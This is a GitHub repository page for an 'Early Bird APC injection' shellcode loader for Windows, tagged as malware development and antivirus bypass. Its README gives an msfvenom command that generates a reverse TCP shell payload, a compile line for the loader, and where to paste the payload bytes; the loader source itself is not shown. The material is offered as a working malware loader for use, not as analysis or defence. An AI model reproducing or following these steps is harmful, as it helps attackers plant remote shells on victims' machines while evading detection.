Skip to content
/ EarlyBird-APC-Injection Public

Implementation of the technique of early loading of shellcode into a legitimate process on pure windows api

License

MIT license
3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

K3rnel-Dev/EarlyBird-APC-Injection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
.gitattributes
.gitattributes
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
early_bird.c
early_bird.c
 
 

Repository files navigation

🛡️ Early Bird APC-Injection

C

⭐ How to compile?

msfvenom -p windows/x64/shell_revere_tcp LHOST=<iface> LPORT=<iport> -f c # generate shellcode with metasploit
x86_64-w64-mingw32-gcc early_bird.c -m64 -Os -flto -fdata-sections -ffunction-sections -Wl,--gc-sections -mwindows -s -o eapc.exe # linux-gcc

> Before compiling, don't forget to change the variable with the bytes to be loaded:

4 unsigned char buf[] = "<PAYLOAD_BYTES>";

About

Implementation of the technique of early loading of shellcode into a legitimate process on pure windows api

Topics

malware injector malware-development shellcode-loader av-bypass shellcode-injector apc-injection malware-loader load-shellcode loader-shellcode injector-malware

Resources

Readme

License

MIT license
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages